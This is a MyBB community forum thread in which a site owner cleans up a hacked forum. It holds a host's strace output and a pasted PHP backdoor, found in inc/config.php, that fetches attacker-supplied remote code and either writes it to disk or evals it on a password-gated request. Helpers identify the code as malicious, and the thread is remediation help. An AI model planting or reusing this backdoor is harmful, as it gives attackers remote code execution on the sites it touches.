MyBB Community Forums

Full Version: Possible malware on my forum?
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
Yesterday I posted about loading problems with "go to latest post". My host checked the website again after a few internal server errors, and they performed a strace. They found a script connecting to an IP address 91.196.216.30. I looked up the IP address in google and it seems some kind of malware which tries to add links to the bottom of your website.

This is what my host found:

Quote:I've taken a look at your site and it after performing an strace I see the script is trying to make repeated connections to the IP 91.196.216.30, however this host appears down, I can not ping it nor connect to port 80. Perhaps there is a typo in this address? I've attached a piece of my strace:
</html>) = 40
gettimeofday({1320279734, 915811}, NULL) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 6
fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)
fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0
connect(6, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("91.196.216.30")}, 16) = -1 EINPROGRESS (Operation now in progress)
poll([{fd=6, events=POLLIN|POLLOUT|POLLERR|POLLHUP}], 1, 60000) = 0 (Timeout)
fcntl64(6, F_SETFL, O_RDWR) = 0
gettimeofday({1320279794, 954178}, NULL) = 0

I searched on google for the IP: http://www.google.nl/search?q=91.196.216...=firefox-a

It seems like something which happens on WordPress sites, but I read that "What this code does is very simple. It connects to http://91.196.216.30/bot.php to get a few links to be added to the bottom of your site. "

Can someone please help me in checking if this is indeed the case and what steps I should take?

I run version 1.6.4 with the manual security patch from the blog.

first run file verification tool in tools & maintenance section AND check for changed files ...
On the tools & maintenance page it suddenly says that ./inc/config.php is not CHMOD to writable (always has been). Maybe this is because I'm currently redirecting the file /forum/index.php to /offline/index.html? That is a page saying that the forum is temporarily offline.

According to the file verification the following files are changed (and a bunch of images, but that's correct because I use custom button images etc.). I don't believe I changed any of these pages (only templates of header etc.).

Quote:index.php
archive/index.php
*customadmindir*/modules/home/index.php
*customadmindir*/index.php
install/resources/upgrade20.php
install/resources/language.lang.php
install/index.php
showthread.php
Delete /install/

Reupload index.php, showthread.php, archive/index.php, *customadmindir*/modules/home/index.php, and *customadmindir*/index.php from a fresh download.
AND you may also have to check /inc/config.php for any malicious code (though it appears to be not writeable)
I assume this is also malicious code in the /inc/config.php

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '67c08c98984cc2bc4b9d1f0d2fe6726a'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

I removed it. And is it correct that the config files ends with:

);
?>

?
^ yes, that is malicious code ; please compare with [wiki : config.php]
Thanks! I first compared to the downloaded one, but that was empty doh. So I just looked myself.

There is one thing that looks valid/authentic, but is not in the wiki config page. So I'm not entirely sure if I should remove this also:

/**
 * Memcache configuration
 *  If you are using memcache as your data-cache,
 *  you need to configure the hostname and port
 *  of your memcache server below.
 *
 * If not using memcache, ignore this section.
 */

$config['memcache']['host'] = 'localhost';
$config['memcache']['port'] = 11211;
That's fine. It's just a caching mechanism.
Thanks. +1 rep for both of you for the quick help.

There seems to be one other issue, but I'm trying to figure out if it's MyBB related or server related. I already sent a ticket to the host, but I'll check here anyway, maybe it has something to do with the malicious code.

When I try to load the front page of my website (which uses custom "news code" to query the forum for new threads in specific forums) I get an MySQL error. Sometimes it loads after long long waiting. The forum itself runs like a charm, no errors and very quick since I removed the malicious files.

The error on the front page is this:

MyBB has experienced an internal SQL error and cannot continue.

SQL Error:
    2006 - MySQL server has gone away
Query:
    SELECT * FROM mybb_threads WHERE fid='2' OR fid='122' ORDER BY tid DESC LIMIT 12 

The news code that is being used on the front page is this:

  <?php
    
    $query = $db->simple_select('threads', '*', "fid='2' OR fid='122' ORDER BY tid DESC LIMIT {$limit}");
    if($db->num_rows($query) > 0)
    {
        while($row = $db->fetch_array($query))
        {
            $query2 = $db->simple_select('posts', '*', "pid='{$row['firstpost']}'");
            $row2 = $db->fetch_array($query2);
            
            $date = my_date($mybb->settings['dateformat'], $row2['dateline'], "", 1);
            $time = my_date($mybb->settings['timeformat'], $row2['dateline'], "", 1);

            $options = array(
                            'allow_html' => '1', 
                            'filter_badwords' => '1', 
                            'allow_mycode' => '1', 
                            'allow_smilies' => '1', 
                            'nl2br' => '1', 
                            'me_username' => '1'
                            );
            $message = $parser->parse_message($row2['message'], $options);
	   	echo("<table border=\"0\" width=\"650px\" valign=\"top\"><tr><td style=\"padding: 6px;\" background=\"images/bg_menurechts.png\" background-repeat: repeat-y background-repeat: repeat-x><span class=\"nieuwstitel\"><a href=\"{$forumpath}showthread.php?tid={$row['tid']}\">{$row['subject']}</a></span><br> 
             <span class=\"standaardkleiner\">Door <a href=\"{$forumpath}member.php?action=profile&uid={$row2['uid']}\">{$row2['username']}</a> op {$date} om {$time}</span></td></tr></table>");
		echo("<br>");
	    echo("<table border=\"0\" width=\"650px\" valign=\"top\"><tr><td style=\"padding: 6px;\"><span class=\"standaardkleiner\">{$message}<br><br>");
            echo("<a href=\"{$forumpath}showthread.php?tid={$row['tid']}\">{$row['replies']} Reacties</a></span><br><br><br></td></tr></table>");
	    }
    }
    else
    {
        echo 'Nothing to display.';
    }
?>
Pages: 1 2